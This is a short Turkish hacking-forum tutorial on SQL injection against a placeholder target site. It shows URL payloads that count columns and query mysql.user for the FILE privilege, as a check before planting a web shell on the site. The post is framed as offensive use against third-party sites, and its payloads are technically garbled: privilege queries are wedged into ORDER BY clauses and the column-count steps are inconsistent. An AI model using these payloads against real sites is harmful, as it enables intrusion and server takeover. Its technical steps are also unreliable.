- 16 Eki 2020
- 442
- 20
Herkese selamlar dostlar ben Xale, bugün sizlere SQL açıklı siteye shell atmaya çalıştığınızda neden olmuyor, neden hata alıyorsunuz bunu göstereceğim.
İzin kontrolü: SQL açıklı hedef siteye shell sokmak için iznimiz var mı?
Mesela, hedef sitemiz hedefsite.com, açıkta hedefsite.com/index.php?id= url'sinde bulunuyor, önce order+by yöntemleriyle sitenin kolon sayısını bulalım.
Şimdi, komutlarımızı manuel olarak yazmaya başlayalım.
Kod:
hedefsite.com/index.php?id=+order+by+1,2--+-
Şimdi, SQL hatamız gitmedi.
Kod:
hedefsite.com/index.php?id=+order+by+1,2,3,4--+-
Hala SQL hatamız gitmedi.
Kod:
hedefsite.com/index.php?id=+order+by+1,2,3,5--+-
Şimdi SQL hatamız 1,2,3,4,5'te gitti yani kolon sayımız 5'miş.
Şimdi, 1,2,3,4,5 sayılarını 1,file_priv,3,4,5 olarak yazalım, sonuç böyle olucak:
Kod:
hedefsite.com/index.php?id=+order+by+1,file_priv,3,4,5--+-
Daha sonra, kolon sayımız 5'in yanına +from+mysql.user yazalım, sonuç böyle olucak:
Kod:
hedefsite.com/index.php?id=+order+by+1,file_priv,2,3,4,5+from+mysql.user--+-
Şimdi ekranda Y yazarsa, bu siteye manuel olarak SQL injection yöntemiyle shell sokabiliriz demektir, eğer başka bir şey yada N yazarsa, bu siteye SQL injection yöntemi ile shell sokamayız demektir.
Bazı SQL açıklı sitelere NEDEN shell sokamayız?
Bazı SQL açıklı sitelere shell sokamamamızın nedeni, sitede out file iznimizin olmamasıdır. Yani, SQL açıklı siteye dosya yazma iznimiz olmalıdır.
Hayırlı günler.
Son düzenleme: